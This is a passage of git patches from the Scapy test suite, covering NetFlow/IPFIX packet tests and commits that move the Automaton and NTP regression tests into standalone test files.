b'\x00\t\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x01\x00\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x08\x00\x04\x00\x0c\x00\x04\x01\x00\x00\x14\x12\x00\x00\x00\x00\x06\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x00\x00' + +pkt = header / netflow_header / flowset / dataFS +pkt = netflowv9_defragment(Ether(raw(pkt)))[0] + +assert NetflowDataflowsetV9 in pkt +assert len(pkt[NetflowDataflowsetV9].records) == 1 +assert pkt[NetflowDataflowsetV9].records[0].IPV4_DST_ADDR == "192.168.0.11" + += NetflowV9 - advanced build +~ netflow + +atm_time = 1547927349.328283 + +header = Ether(src="00:00:00:00:00:00", dst="aa:aa:aa:aa:aa:aa")/IP(dst="127.0.0.1", src="127.0.0.1")/UDP()/NetflowHeader()/NetflowHeaderV9(unixSecs=atm_time) +flowset = NetflowFlowsetV9(templates=[NetflowTemplateV9(template_fields=[NetflowTemplateFieldV9(fieldType=8, fieldLength=4),NetflowTemplateFieldV9(fieldType=12, fieldLength=4),NetflowTemplateFieldV9(fieldType=5, fieldLength=1),NetflowTemplateFieldV9(fieldType=4, fieldLength=1),NetflowTemplateFieldV9(fieldType=7, fieldLength=2),NetflowTemplateFieldV9(fieldType=11, fieldLength=2),NetflowTemplateFieldV9(fieldType=32, fieldLength=2),NetflowTemplateFieldV9(fieldType=10, fieldLength=4),NetflowTemplateFieldV9(fieldType=16, fieldLength=4),NetflowTemplateFieldV9(fieldType=17, fieldLength=4),NetflowTemplateFieldV9(fieldType=18, fieldLength=4),NetflowTemplateFieldV9(fieldType=14, fieldLength=4),NetflowTemplateFieldV9(fieldType=1, fieldLength=4),NetflowTemplateFieldV9(fieldType=2, fieldLength=4),NetflowTemplateFieldV9(fieldType=22, fieldLength=4),NetflowTemplateFieldV9(fieldType=21, fieldLength=4),NetflowTemplateFieldV9(fieldType=15, fieldLength=4),NetflowTemplateFieldV9(fieldType=9, fieldLength=1),NetflowTemplateFieldV9(fieldType=13, fieldLength=1),NetflowTemplateFieldV9(fieldType=6, fieldLength=1),NetflowTemplateFieldV9(fieldType=60, fieldLength=1)], templateID=424, fieldCount=21)], flowSetID=0, length=92) +dataflowset = NetflowDataflowsetV9(records=[NetflowRecordV9(fieldValue=b'\x14\x00\x00\xfd\x1e\x00\x00\xfd\x00\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x03 \x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02\xfb\x00\x15a|\x00\x00\x07\x0f$\x95x\xed$\x99\x91<\ndg\x01 \x00\x04')], templateID=424) + +pkt = netflowv9_defragment(list(header/flowset/dataflowset))[0] +assert pkt.records[0].IPV4_NEXT_HOP == "10.100.103.1" +assert pkt.records[0].OUTPUT_SNMP == b'\x00\x00\x02\xfb' + +assert raw(pkt) == b'\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00\xcc\x00\x01\x00\x00@\x11|\x1e\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x07\x08\x07\x00\xb8\x86\xe7\x00\t\x00\x02\x00\x00\x00\x00\\C\x7f5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x01\xa8\x00\x15\x00\x08\x00\x04\x00\x0c\x00\x04\x00\x05\x00\x01\x00\x04\x00\x01\x00\x07\x00\x02\x00\x0b\x00\x02\x00 \x00\x02\x00\n\x00\x04\x00\x10\x00\x04\x00\x11\x00\x04\x00\x12\x00\x04\x00\x0e\x00\x04\x00\x01\x00\x04\x00\x02\x00\x04\x00\x16\x00\x04\x00\x15\x00\x04\x00\x0f\x00\x04\x00\t\x00\x01\x00\r\x00\x01\x00\x06\x00\x01\x00<\x00\x01\x01\xa8\x00@\x14\x00\x00\xfd\x1e\x00\x00\xfd\x00\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x03 \x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02\xfb\x00\x15a|\x00\x00\x07\x0f$\x95x\xed$\x99\x91<\ndg\x01 \x00\x04' + += NetflowV9 - padding #GH2257 + +dat = hex_bytes("fb200807007840a10009000277efe9c450c843f900362202000000000001001801000004000800010000002a00040029000400000101004477ef819077ef81900000003c00000001009300930ac900640ac9033b060009ee0b3500000ac9033b131302000000000000260bdc69aa6480996649a000000000") +pkt = UDP(dat) +assert pkt[NetflowOptionsFlowsetV9].pad == b"\x00\x00" +pkt[NetflowOptionsFlowsetV9].pad = None +assert raw(pkt) == dat + + +############ +############ ++ Netflow v10 (aka IPFix) +~ netflow + += IPFix dissection + +import os +tmp = "/test/pcaps/ipfix.pcap" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +a = sniff(offline=filename, session=NetflowSession) + +# Templates +pkt1 = a[0] +assert NetflowHeaderV10 in pkt1 +assert len(pkt1[NetflowFlowsetV9].templates) == 1 +assert len(pkt1[NetflowFlowsetV9].templates[0].template_fields) == 23 +flds = pkt1[NetflowFlowsetV9].templates[0].template_fields +assert (flds[0].fieldType == 8 and flds[0].fieldLength == 4) +assert (flds[4].fieldType == 7 and flds[4].fieldLength == 2) + +# Data +pkt2 = a[2] +assert NetflowHeaderV10 in pkt2 +assert len(pkt2.records) == 1 +assert pkt2.records[0].IPV4_SRC_ADDR == "70.1.115.1" +assert pkt2.records[0].flowStartMilliseconds == 1480449931519 + +# Options +pkt3 = a[1] +assert NetflowOptionsFlowset10 in pkt3 +assert pkt3.scope_field_count == 1 +assert pkt3.field_count == 3 +assert len(pkt3[NetflowOptionsFlowset10].scopes) == 1 +assert len(pkt3[NetflowOptionsFlowset10].options) == 2 +assert pkt3.scopes[0].scopeFieldType == 5 +assert pkt3.scopes[0].scopeFieldlength == 2 +assert pkt3[NetflowOptionsFlowset10].options[0].optionFieldType == 36 + +# Templates with enterprise-specific Information Elements. +s=b'\x01\x07\x00\x12\x01\n\x00\x04\x84\x0c\x00\x02\x00\x00\x00\t\x01\n\x00&\x00\x0b\x00\x02\x00\x07\x00\x02\x00\x04\x00\x01\x00\x0c\x00\x04\x00\x08\x00\x04\x00\xea\x00\x02\x01\n\x00\x01\x84\x10\x00\x06\x00\x00\x00\t\x84\x0e\x00\x06\x00\x00\x00\t\x84\x0f\x00\x06\x00\x00\x00\t\x00\x01\x00\x04\x00\x02\x00\x04\x00\xf3\x00\x02\x00\x06\x00\x01\x01\n\x00#' +pkt4 = NetflowTemplateV9(s) +assert len(pkt4.template_fields) == pkt4.fieldCount +assert sum([template.fieldLength for template in pkt4.template_fields]) == 124 + += NetflowV10/IPFIX - build + +netflow_header = NetflowHeader()/NetflowHeaderV10() + +flowset = NetflowFlowsetV9( + templates=[NetflowTemplateV9( + template_fields=[ + NetflowTemplateFieldV9(fieldType=1, fieldLength=1), # IN_BYTES + NetflowTemplateFieldV9(fieldType=2, fieldLength=4), # IN_PKTS + NetflowTemplateFieldV9(fieldType=4), # PROTOCOL + NetflowTemplateFieldV9(fieldType=8), # IPV4_SRC_ADDR + NetflowTemplateFieldV9(fieldType=12), # IPV4_DST_ADDR + ], + templateID=256, + fieldCount=5) + ], + flowSetID=0 +) +recordClass = GetNetflowRecordV9(flowset) +dataFS = NetflowDataflowsetV9( + templateID=256, + records=[ # Some random data. + recordClass( + IN_BYTES=b"\x12", + IN_PKTS=b"\0\0\0\0", + PROTOCOL=6, + IPV4_SRC_ADDR="192.168.0.10", + IPV4_DST_ADDR="192.168.0.11" + ), + ], +) + +pkt = netflow_header / flowset / dataFS +assert raw(pkt) == b'\x00\n\x00>\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x01\x00\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x08\x00\x04\x00\x0c\x00\x04\x01\x00\x00\x14\x12\x00\x00\x00\x00\x06\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x00\x00' + += NetflowSession - dissect packet NetflowV9 packets on-the-flow + +import os +tmp = "/test/pcaps/netflowv9.pcap" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename + +dissected_packets = [] +def callback(pkt): + dissected_packets.append(pkt) + +sniff(offline=filename, session=NetflowSession, prn=callback) +records = dissected_packets[3][NetflowDataflowsetV9].records +assert len(records) == 24 +assert records[0].IPV4_SRC_ADDR == '20.0.1.174' +assert records[0].IPV4_NEXT_HOP == '10.100.103.1' From 7d0db78b097ccd6dc8a8f3fdafa08e07405d7348 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 29 Oct 2020 19:59:27 +0100 Subject: [PATCH 0364/1632] Standalone Automaton tests Co-authored-by: Gabriel Potter Co-authored-by: Guillaume Valadon Co-authored-by: Pierre LALET Co-authored-by: Phil Co-authored-by: Robin Jarry --- test/regression.uts | 424 -------------------------------------- test/scapy/automaton.uts | 428 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 428 insertions(+), 424 deletions(-) create mode 100644 test/scapy/automaton.uts diff --git a/test/regression.uts b/test/regression.uts index 8105513db2e..899111afbbf 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1867,430 +1867,6 @@ if conf.manufdb: else: True -############ -############ -+ Automaton tests - -= Simple automaton -~ automaton -class ATMT1(Automaton): - def parse_args(self, init, *args, **kargs): - Automaton.parse_args(self, *args, **kargs) - self.init = init - @ATMT.state(initial=1) - def BEGIN(self): - raise self.MAIN(self.init) - @ATMT.state() - def MAIN(self, s): - return s - @ATMT.condition(MAIN, prio=-1) - def go_to_END(self, s): - if len(s) > 20: - raise self.END(s).action_parameters(s) - @ATMT.condition(MAIN) - def trA(self, s): - if s.endswith("b"): - raise self.MAIN(s+"a") - @ATMT.condition(MAIN) - def trB(self, s): - if s.endswith("a"): - raise self.MAIN(s*2+"b") - @ATMT.state(final=1) - def END(self, s): - return s - @ATMT.action(go_to_END) - def action_test(self, s): - self.result = s - -= Simple automaton Tests -~ automaton - -a=ATMT1(init="a", ll=lambda: None, recvsock=lambda: None) -r = a.run() -r -assert(r == 'aabaaababaaabaaababab') -r = a.result -r -assert(r == 'aabaaababaaabaaababab') -a = ATMT1(init="b", ll=lambda: None, recvsock=lambda: None) -r = a.run() -r -assert(r == 'babababababababababababababab') -r = a.result -assert(r == 'babababababababababababababab') - -= Simple automaton stuck test -~ automaton - -try: - ATMT1(init="", ll=lambda: None, recvsock=lambda: None).run() -except Automaton.Stuck: - True -else: - False - - -= Automaton state overloading -~ automaton -class ATMT2(ATMT1): - @ATMT.state() - def MAIN(self, s): - return "c"+ATMT1.MAIN(self, s).run() - -a=ATMT2(init="a", ll=lambda: None, recvsock=lambda: None) -r = a.run() -r -assert(r == 'ccccccacabacccacababacccccacabacccacababab') - - -r = a.result -r -assert(r == 'ccccccacabacccacababacccccacabacccacababab') -a=ATMT2(init="b", ll=lambda: None, recvsock=lambda: None) -r = a.run() -r -assert(r == 'cccccbaccbabaccccbaccbabab') -r = a.result -r -assert(r == 'cccccbaccbabaccccbaccbabab') - - -= Automaton condition overloading -~ automaton -class ATMT3(ATMT2): - @ATMT.condition(ATMT1.MAIN) - def trA(self, s): - if s.endswith("b"): - raise self.MAIN(s+"da") - - -a=ATMT3(init="a", debug=2, ll=lambda: None, recvsock=lambda: None) -r = a.run() -r -assert(r == 'cccccacabdacccacabdabda') -r = a.result -r -assert(r == 'cccccacabdacccacabdabda') -a=ATMT3(init="b", ll=lambda: None, recvsock=lambda: None) -r = a.run() -r -assert(r == 'cccccbdaccbdabdaccccbdaccbdabdab') - -r = a.result -r -assert(r == 'cccccbdaccbdabdaccccbdaccbdabdab') - - -= Automaton action overloading -~ automaton -class ATMT4(ATMT3): - @ATMT.action(ATMT1.go_to_END) - def action_test(self, s): - self.result = "e"+s+"e" - -a=ATMT4(init="a", ll=lambda: None, recvsock=lambda: None) -r = a.run() -r -assert(r == 'cccccacabdacccacabdabda') -r = a.result -r -assert(r == 'ecccccacabdacccacabdabdae') -a=ATMT4(init="b", ll=lambda: None, recvsock=lambda: None) -r = a.run() -r -assert(r == 'cccccbdaccbdabdaccccbdaccbdabdab') -r = a.result -r -assert(r == 'ecccccbdaccbdabdaccccbdaccbdabdabe') - - -= Automaton priorities -~ automaton -class ATMT5(Automaton): - @ATMT.state(initial=1) - def BEGIN(self): - self.res = "J" - @ATMT.condition(BEGIN, prio=1) - def tr1(self): - self.res += "i" - raise self.END() - @ATMT.condition(BEGIN) - def tr2(self): - self.res += "p" - @ATMT.condition(BEGIN, prio=-1) - def tr3(self): - self.res += "u" - - @ATMT.action(tr1) - def ac1(self): - self.res += "e" - @ATMT.action(tr1, prio=-1) - def ac2(self): - self.res += "t" - @ATMT.action(tr1, prio=1) - def ac3(self): - self.res += "r" - - @ATMT.state(final=1) - def END(self): - return self.res - -a=ATMT5(ll=lambda: None, recvsock=lambda: None) -r = a.run() -r -assert(r == 'Jupiter') - -= Automaton test same action for many conditions -~ automaton -class ATMT6(Automaton): - @ATMT.state(initial=1) - def BEGIN(self): - self.res="M" - @ATMT.condition(BEGIN) - def tr1(self): - raise self.MIDDLE() - @ATMT.action(tr1) # default prio=0 - def add_e(self): - self.res += "e" - @ATMT.action(tr1, prio=2) - def add_c(self): - self.res += "c" - @ATMT.state() - def MIDDLE(self): - self.res += "u" - @ATMT.condition(MIDDLE) - def tr2(self): - raise self.END() - @ATMT.action(tr2, prio=2) - def add_y(self): - self.res += "y" - @ATMT.action(tr1, prio=1) - @ATMT.action(tr2) - def add_r(self): - self.res += "r" - @ATMT.state(final=1) - def END(self): - return self.res - -a=ATMT6(ll=lambda: None, recvsock=lambda: None) -r = a.run() -assert(r == 'Mercury') - -a.restart() -r = a.run() -r -assert(r == 'Mercury') - -= Automaton test io event -~ automaton - -class ATMT7(Automaton): - @ATMT.state(initial=1) - def BEGIN(self): - self.res = "S" - @ATMT.ioevent(BEGIN, name="tst") - def tr1(self, fd): - self.res += fd.recv() - raise self.NEXT_STATE() - @ATMT.state() - def NEXT_STATE(self): - self.oi.tst.send("ur") - @ATMT.ioevent(NEXT_STATE, name="tst") - def tr2(self, fd): - self.res += fd.recv() - raise self.END() - @ATMT.state(final=1) - def END(self): - self.res += "n" - return self.res - -a=ATMT7(ll=lambda: None, recvsock=lambda: None) -a.run(wait=False) -a.io.tst.send("at") -r = a.io.tst.recv() -r -a.io.tst.send(r) -r = a.run() -r -assert(r == "Saturn") - -a.restart() -a.run(wait=False) -a.io.tst.send("at") -r = a.io.tst.recv() -r -a.io.tst.send(r) -r = a.run() -r -assert(r == "Saturn") - -= Automaton test io event from external fd -~ automaton -import os - -class ATMT8(Automaton): - @ATMT.state(initial=1) - def BEGIN(self): - self.res = b"U" - @ATMT.ioevent(BEGIN, name="extfd") - def tr1(self, fd): - self.res += fd.read(2) - raise self.NEXT_STATE() - @ATMT.state() - def NEXT_STATE(self): - pass - @ATMT.ioevent(NEXT_STATE, name="extfd") - def tr2(self, fd): - self.res += fd.read(2) - raise self.END() - @ATMT.state(final=1) - def END(self): - self.res += b"s" - return self.res - -if WINDOWS: - r = w = ObjectPipe() -else: - r,w = os.pipe() - -def writeOn(w, msg): - if WINDOWS: - w.write(msg) - else: - os.write(w, msg) - -a=ATMT8(external_fd={"extfd":r}, ll=lambda: None, recvsock=lambda: None) -a.run(wait=False) -writeOn(w, b"ra") -writeOn(w, b"nu") - -r = a.run() -r -assert(r == b"Uranus") - -a.restart() -a.run(wait=False) -writeOn(w, b"ra") -writeOn(w, b"nu") -r = a.run() -r -assert(r == b"Uranus") - -= Automaton test interception_points, and restart -~ automaton -class ATMT9(Automaton): - def my_send(self, x): - self.io.loop.send(x) - @ATMT.state(initial=1) - def BEGIN(self): - self.res = "V" - self.send(Raw("ENU")) - @ATMT.ioevent(BEGIN, name="loop") - def received_sth(self, fd): - self.res += plain_str(fd.recv().load) - raise self.END() - @ATMT.state(final=1) - def END(self): - self.res += "s" - return self.res - -a=ATMT9(debug=5, ll=lambda: None, recvsock=lambda: None) -r = a.run() -r -assert(r == "VENUs") - -a.restart() -r = a.run() -r -assert(r == "VENUs") - -a.restart() -a.BEGIN.intercepts() -while True: - try: - x = a.run() - except Automaton.InterceptionPoint as p: - a.accept_packet(Raw(p.packet.load.lower()), wait=False) - else: - break - -r = x -r -assert(r == "Venus") - -= Automaton graph -~ automaton - -class HelloWorld(Automaton): - @ATMT.state(initial=1) - def BEGIN(self): - pass - @ATMT.condition(BEGIN) - def wait_for_nothing(self): - raise self.END() - @ATMT.action(wait_for_nothing) - def on_nothing(self): - pass - @ATMT.state(final=1) - def END(self): - pass - -graph = HelloWorld.build_graph() -assert graph.startswith("digraph") -assert '"BEGIN" -> "END"' in graph - -= TCP_client automaton -~ automaton netaccess needs_root -* This test retries on failure because it may fail quite easily - -import functools - -SECDEV_IP4 = "217.25.178.5" - -if LINUX: - import os - IPTABLE_RULE = "iptables -%c INPUT -s %s -p tcp --sport 80 -j DROP" - # Drop packets from SECDEV_IP4 - assert(os.system(IPTABLE_RULE % ('A', SECDEV_IP4)) == 0) - -load_layer("http") - -def _tcp_client_test(): - req = HTTP()/HTTPRequest( - Accept_Encoding=b'gzip, deflate', - Cache_Control=b'no-cache', - Pragma=b'no-cache', - Connection=b'keep-alive', - Host=b'www.secdev.org', - ) - t = TCP_client.tcplink(HTTP, SECDEV_IP4, 80) - response = t.sr1(req, timeout=3) - t.close() - assert response.Http_Version == b'HTTP/1.1' - assert response.Status_Code == b'200' - assert response.Reason_Phrase == b'OK' - -def _http_request_test(_raw=False): - response = http_request("www.google.com", path="/", raw=_raw, iptables=LINUX) - assert response.Http_Version == b'HTTP/1.1' - assert response.Status_Code == b'200' - assert response.Reason_Phrase == b'OK' - -# Native sockets -retry_test(_http_request_test) - -# Our raw socket test doesn't pass on Travis BSD -# (likely because the firewall is different and our iptables call isn't enough) -if not BSD: - retry_test(functools.partial(_http_request_test, _raw=True)) - -if LINUX: - try: - retry_test(_tcp_client_test) - finally: - if LINUX: - # Remove the iptables rule - assert(os.system(IPTABLE_RULE % ('D', SECDEV_IP4)) == 0) ############ ############ diff --git a/test/scapy/automaton.uts b/test/scapy/automaton.uts new file mode 100644 index 00000000000..faf2566ef13 --- /dev/null +++ b/test/scapy/automaton.uts @@ -0,0 +1,428 @@ +% Automaton regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ ++ Automaton tests + += Simple automaton +~ automaton +class ATMT1(Automaton): + def parse_args(self, init, *args, **kargs): + Automaton.parse_args(self, *args, **kargs) + self.init = init + @ATMT.state(initial=1) + def BEGIN(self): + raise self.MAIN(self.init) + @ATMT.state() + def MAIN(self, s): + return s + @ATMT.condition(MAIN, prio=-1) + def go_to_END(self, s): + if len(s) > 20: + raise self.END(s).action_parameters(s) + @ATMT.condition(MAIN) + def trA(self, s): + if s.endswith("b"): + raise self.MAIN(s+"a") + @ATMT.condition(MAIN) + def trB(self, s): + if s.endswith("a"): + raise self.MAIN(s*2+"b") + @ATMT.state(final=1) + def END(self, s): + return s + @ATMT.action(go_to_END) + def action_test(self, s): + self.result = s + += Simple automaton Tests +~ automaton + +a=ATMT1(init="a", ll=lambda: None, recvsock=lambda: None) +r = a.run() +r +assert(r == 'aabaaababaaabaaababab') +r = a.result +r +assert(r == 'aabaaababaaabaaababab') +a = ATMT1(init="b", ll=lambda: None, recvsock=lambda: None) +r = a.run() +r +assert(r == 'babababababababababababababab') +r = a.result +assert(r == 'babababababababababababababab') + += Simple automaton stuck test +~ automaton + +try: + ATMT1(init="", ll=lambda: None, recvsock=lambda: None).run() +except Automaton.Stuck: + True +else: + False + + += Automaton state overloading +~ automaton +class ATMT2(ATMT1): + @ATMT.state() + def MAIN(self, s): + return "c"+ATMT1.MAIN(self, s).run() + +a=ATMT2(init="a", ll=lambda: None, recvsock=lambda: None) +r = a.run() +r +assert(r == 'ccccccacabacccacababacccccacabacccacababab') + + +r = a.result +r +assert(r == 'ccccccacabacccacababacccccacabacccacababab') +a=ATMT2(init="b", ll=lambda: None, recvsock=lambda: None) +r = a.run() +r +assert(r == 'cccccbaccbabaccccbaccbabab') +r = a.result +r +assert(r == 'cccccbaccbabaccccbaccbabab') + + += Automaton condition overloading +~ automaton +class ATMT3(ATMT2): + @ATMT.condition(ATMT1.MAIN) + def trA(self, s): + if s.endswith("b"): + raise self.MAIN(s+"da") + + +a=ATMT3(init="a", debug=2, ll=lambda: None, recvsock=lambda: None) +r = a.run() +r +assert(r == 'cccccacabdacccacabdabda') +r = a.result +r +assert(r == 'cccccacabdacccacabdabda') +a=ATMT3(init="b", ll=lambda: None, recvsock=lambda: None) +r = a.run() +r +assert(r == 'cccccbdaccbdabdaccccbdaccbdabdab') + +r = a.result +r +assert(r == 'cccccbdaccbdabdaccccbdaccbdabdab') + + += Automaton action overloading +~ automaton +class ATMT4(ATMT3): + @ATMT.action(ATMT1.go_to_END) + def action_test(self, s): + self.result = "e"+s+"e" + +a=ATMT4(init="a", ll=lambda: None, recvsock=lambda: None) +r = a.run() +r +assert(r == 'cccccacabdacccacabdabda') +r = a.result +r +assert(r == 'ecccccacabdacccacabdabdae') +a=ATMT4(init="b", ll=lambda: None, recvsock=lambda: None) +r = a.run() +r +assert(r == 'cccccbdaccbdabdaccccbdaccbdabdab') +r = a.result +r +assert(r == 'ecccccbdaccbdabdaccccbdaccbdabdabe') + + += Automaton priorities +~ automaton +class ATMT5(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + self.res = "J" + @ATMT.condition(BEGIN, prio=1) + def tr1(self): + self.res += "i" + raise self.END() + @ATMT.condition(BEGIN) + def tr2(self): + self.res += "p" + @ATMT.condition(BEGIN, prio=-1) + def tr3(self): + self.res += "u" + @ATMT.action(tr1) + def ac1(self): + self.res += "e" + @ATMT.action(tr1, prio=-1) + def ac2(self): + self.res += "t" + @ATMT.action(tr1, prio=1) + def ac3(self): + self.res += "r" + @ATMT.state(final=1) + def END(self): + return self.res + +a=ATMT5(ll=lambda: None, recvsock=lambda: None) +r = a.run() +r +assert(r == 'Jupiter') + += Automaton test same action for many conditions +~ automaton +class ATMT6(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + self.res="M" + @ATMT.condition(BEGIN) + def tr1(self): + raise self.MIDDLE() + @ATMT.action(tr1) # default prio=0 + def add_e(self): + self.res += "e" + @ATMT.action(tr1, prio=2) + def add_c(self): + self.res += "c" + @ATMT.state() + def MIDDLE(self): + self.res += "u" + @ATMT.condition(MIDDLE) + def tr2(self): + raise self.END() + @ATMT.action(tr2, prio=2) + def add_y(self): + self.res += "y" + @ATMT.action(tr1, prio=1) + @ATMT.action(tr2) + def add_r(self): + self.res += "r" + @ATMT.state(final=1) + def END(self): + return self.res + +a=ATMT6(ll=lambda: None, recvsock=lambda: None) +r = a.run() +assert(r == 'Mercury') + +a.restart() +r = a.run() +r +assert(r == 'Mercury') + += Automaton test io event +~ automaton + +class ATMT7(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + self.res = "S" + @ATMT.ioevent(BEGIN, name="tst") + def tr1(self, fd): + self.res += fd.recv() + raise self.NEXT_STATE() + @ATMT.state() + def NEXT_STATE(self): + self.oi.tst.send("ur") + @ATMT.ioevent(NEXT_STATE, name="tst") + def tr2(self, fd): + self.res += fd.recv() + raise self.END() + @ATMT.state(final=1) + def END(self): + self.res += "n" + return self.res + +a=ATMT7(ll=lambda: None, recvsock=lambda: None) +a.run(wait=False) +a.io.tst.send("at") +r = a.io.tst.recv() +r +a.io.tst.send(r) +r = a.run() +r +assert(r == "Saturn") + +a.restart() +a.run(wait=False) +a.io.tst.send("at") +r = a.io.tst.recv() +r +a.io.tst.send(r) +r = a.run() +r +assert(r == "Saturn") + += Automaton test io event from external fd +~ automaton +import os + +class ATMT8(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + self.res = b"U" + @ATMT.ioevent(BEGIN, name="extfd") + def tr1(self, fd): + self.res += fd.read(2) + raise self.NEXT_STATE() + @ATMT.state() + def NEXT_STATE(self): + pass + @ATMT.ioevent(NEXT_STATE, name="extfd") + def tr2(self, fd): + self.res += fd.read(2) + raise self.END() + @ATMT.state(final=1) + def END(self): + self.res += b"s" + return self.res + +if WINDOWS: + r = w = ObjectPipe() +else: + r,w = os.pipe() + +def writeOn(w, msg): + if WINDOWS: + w.write(msg) + else: + os.write(w, msg) + +a=ATMT8(external_fd={"extfd":r}, ll=lambda: None, recvsock=lambda: None) +a.run(wait=False) +writeOn(w, b"ra") +writeOn(w, b"nu") + +r = a.run() +r +assert(r == b"Uranus") + +a.restart() +a.run(wait=False) +writeOn(w, b"ra") +writeOn(w, b"nu") +r = a.run() +r +assert(r == b"Uranus") + += Automaton test interception_points, and restart +~ automaton +class ATMT9(Automaton): + def my_send(self, x): + self.io.loop.send(x) + @ATMT.state(initial=1) + def BEGIN(self): + self.res = "V" + self.send(Raw("ENU")) + @ATMT.ioevent(BEGIN, name="loop") + def received_sth(self, fd): + self.res += plain_str(fd.recv().load) + raise self.END() + @ATMT.state(final=1) + def END(self): + self.res += "s" + return self.res + +a=ATMT9(debug=5, ll=lambda: None, recvsock=lambda: None) +r = a.run() +r +assert(r == "VENUs") + +a.restart() +r = a.run() +r +assert(r == "VENUs") + +a.restart() +a.BEGIN.intercepts() +while True: + try: + x = a.run() + except Automaton.InterceptionPoint as p: + a.accept_packet(Raw(p.packet.load.lower()), wait=False) + else: + break + +r = x +r +assert(r == "Venus") + += Automaton graph +~ automaton + +class HelloWorld(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + pass + @ATMT.condition(BEGIN) + def wait_for_nothing(self): + raise self.END() + @ATMT.action(wait_for_nothing) + def on_nothing(self): + pass + @ATMT.state(final=1) + def END(self): + pass + +graph = HelloWorld.build_graph() +assert graph.startswith("digraph") +assert '"BEGIN" -> "END"' in graph + += TCP_client automaton +~ automaton netaccess needs_root +* This test retries on failure because it may fail quite easily + +import functools + +SECDEV_IP4 = "217.25.178.5" + +if LINUX: + import os + IPTABLE_RULE = "iptables -%c INPUT -s %s -p tcp --sport 80 -j DROP" + # Drop packets from SECDEV_IP4 + assert(os.system(IPTABLE_RULE % ('A', SECDEV_IP4)) == 0) + +load_layer("http") + +def _tcp_client_test(): + req = HTTP()/HTTPRequest( + Accept_Encoding=b'gzip, deflate', + Cache_Control=b'no-cache', + Pragma=b'no-cache', + Connection=b'keep-alive', + Host=b'www.secdev.org', + ) + t = TCP_client.tcplink(HTTP, SECDEV_IP4, 80) + response = t.sr1(req, timeout=3) + t.close() + assert response.Http_Version == b'HTTP/1.1' + assert response.Status_Code == b'200' + assert response.Reason_Phrase == b'OK' + +def _http_request_test(_raw=False): + response = http_request("www.google.com", path="/", raw=_raw, iptables=LINUX) + assert response.Http_Version == b'HTTP/1.1' + assert response.Status_Code == b'200' + assert response.Reason_Phrase == b'OK' + +# Native sockets +retry_test(_http_request_test) + +# Our raw socket test doesn't pass on Travis BSD +# (likely because the firewall is different and our iptables call isn't enough) +if not BSD: + retry_test(functools.partial(_http_request_test, _raw=True)) + +if LINUX: + try: + retry_test(_tcp_client_test) + finally: + if LINUX: + # Remove the iptables rule + assert(os.system(IPTABLE_RULE % ('D', SECDEV_IP4)) == 0) + From 24c24dbb68e36ea37114626f7d5b598033ece619 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 31 Oct 2020 15:13:25 +0100 Subject: [PATCH 0365/1632] Standalone NTP unit tests (#2915) Co-authored-by: Phil Co-authored-by: Pierre Lalet , Co-authored-by: Pierre Lorinquer Co-authored-by: Neurocinetics <0901653@student.hr.nl> Co-authored-by: Gabriel Potter Co-authored-by: Guillaume Valadon --- test/regression.uts | 1087 ------------------------------------ test/scapy/layers/ntp.uts | 1093 +++++++++++++++++++++++++++++++++++++ 2 files changed, 1093 insertions(+), 1087 deletions(-) create mode 100644 test/scapy/layers/ntp.uts diff --git a/test/regression.uts b/test/regression.uts index d3a131228d0..41245a30010 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1059,14 +1059,6 @@ assert pkt[IP::{"ttl":3}].ttl == 3 assert pkt.getlayer(IP, ttl=3).ttl == 3 assert IPv6ExtHdrHopByHop(options=[HBHOptUnknown()]).getlayer(HBHOptUnknown, otype=42) is None -= specific haslayer and getlayer implementations for NTP -~ haslayer getlayer NTP -pkt = IP() / UDP() / NTPHeader() -assert NTP in pkt -assert pkt.haslayer(NTP) -assert isinstance(pkt[NTP], NTPHeader) -assert isinstance(pkt.getlayer(NTP), NTPHeader) - = specific haslayer and getlayer implementations for EAP ~ haslayer getlayer EAP pkt = Ether() / EAPOL() / EAP_MD5() @@ -7214,1085 +7206,6 @@ assert s.bridgemac == "aa:aa:aa:aa:aa:aa" assert s.hellotime == 5 -############ -############ -+ NTP module tests - -= NTP - Layers (1) -p = NTPHeader() -assert(NTPHeader in p) -assert(not NTPControl in p) -assert(not NTPPrivate in p) -assert(NTP in p) -p = NTPControl() -assert(not NTPHeader in p) -assert(NTPControl in p) -assert(not NTPPrivate in p) -assert(NTP in p) -p = NTPPrivate() -assert(not NTPHeader in p) -assert(not NTPControl in p) -assert(NTPPrivate in p) -assert(NTP in p) - -= NTP - Layers (2) -p = NTPHeader() -assert(type(p[NTP]) == NTPHeader) -p = NTPControl() -assert(type(p[NTP]) == NTPControl) -p = NTPPrivate() -assert(type(p[NTP]) == NTPPrivate) - -= NTP - sessions (1) 